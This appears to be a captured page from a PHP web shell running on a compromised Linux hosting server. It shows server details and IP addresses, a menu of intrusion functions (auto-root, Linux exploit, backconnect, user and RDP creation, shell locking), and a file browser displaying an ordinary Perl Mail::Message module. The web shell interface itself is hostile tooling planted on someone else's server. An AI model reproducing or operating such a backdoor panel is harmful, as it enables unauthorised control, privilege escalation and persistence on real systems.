Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Mail /
Message /
Field /
[ HOME SHELL ]
Name
Size
Permission
Action
AddrGroup.pm
1.68
KB
-rw-r--r--
AddrGroup.pod
7.61
KB
-rw-r--r--
Address.pm
2.07
KB
-rw-r--r--
Address.pod
6.72
KB
-rw-r--r--
Addresses.pm
5.95
KB
-rw-r--r--
Addresses.pod
14.97
KB
-rw-r--r--
Attribute.pm
5.25
KB
-rw-r--r--
Attribute.pod
8.39
KB
-rw-r--r--
AuthResults.pm
5.3
KB
-rw-r--r--
AuthResults.pod
13.46
KB
-rw-r--r--
DKIM.pm
2.02
KB
-rw-r--r--
DKIM.pod
14.28
KB
-rw-r--r--
Date.pm
2.73
KB
-rw-r--r--
Date.pod
12.5
KB
-rw-r--r--
Fast.pm
2.03
KB
-rw-r--r--
Fast.pod
10.85
KB
-rw-r--r--
Flex.pm
2.59
KB
-rw-r--r--
Flex.pod
9.61
KB
-rw-r--r--
Full.pm
10.86
KB
-rw-r--r--
Full.pod
19.77
KB
-rw-r--r--
Structured.pm
3.53
KB
-rw-r--r--
Structured.pod
15.04
KB
-rw-r--r--
URIs.pm
1.73
KB
-rw-r--r--
URIs.pod
13.24
KB
-rw-r--r--
Unstructured.pm
1018
B
-rw-r--r--
Unstructured.pod
12.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Fast.pm
# Copyrights 2001-2022 by [Mark Overmeer <markov@cpan.org>]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.03. # This code is part of distribution Mail-Message. Meta-POD processed with # OODoc into POD and HTML manual-pages. See README.md # Copyright Mark Overmeer. Licensed under the same terms as Perl itself. package Mail::Message::Field::Fast; use vars '$VERSION'; $VERSION = '3.012'; use base 'Mail::Message::Field'; use strict; use warnings; #------------------------------------------ # # The DATA is stored as: [ NAME, FOLDED-BODY ] # The body is kept in a folded fashion, where each line starts with # a single blank. sub new($;$@) { my $class = shift; my ($name, $body) = $class->consume(@_==1 ? (shift) : (shift, shift)); return () unless defined $body; my $self = bless [$name, $body], $class; # Attributes $self->comment(shift) if @_==1; # one attribute line $self->attribute(shift, shift) while @_ > 1; # attribute pairs $self; } sub clone() { my $self = shift; bless [ @$self ], ref $self; } sub length() { my $self = shift; length($self->[0]) + 1 + length($self->[1]); } sub name() { lc shift->[0] } sub Name() { shift->[0] } sub folded() { my $self = shift; return $self->[0].':'.$self->[1] unless wantarray; my @lines = $self->foldedBody; my $first = $self->[0]. ':'. shift @lines; ($first, @lines); } sub unfoldedBody($;@) { my $self = shift; $self->[1] = $self->fold($self->[0], @_) if @_; $self->unfold($self->[1]); } sub foldedBody($) { my ($self, $body) = @_; if(@_==2) { $self->[1] = $body } else { $body = $self->[1] } wantarray ? (split m/^/, $body) : $body; } # For performance reasons only sub print(;$) { my $self = shift; my $fh = shift || select; if(ref $fh eq 'GLOB') { print $fh $self->[0].':'.$self->[1] } else { $fh->print($self->[0].':'.$self->[1]) } $self; } 1;
Close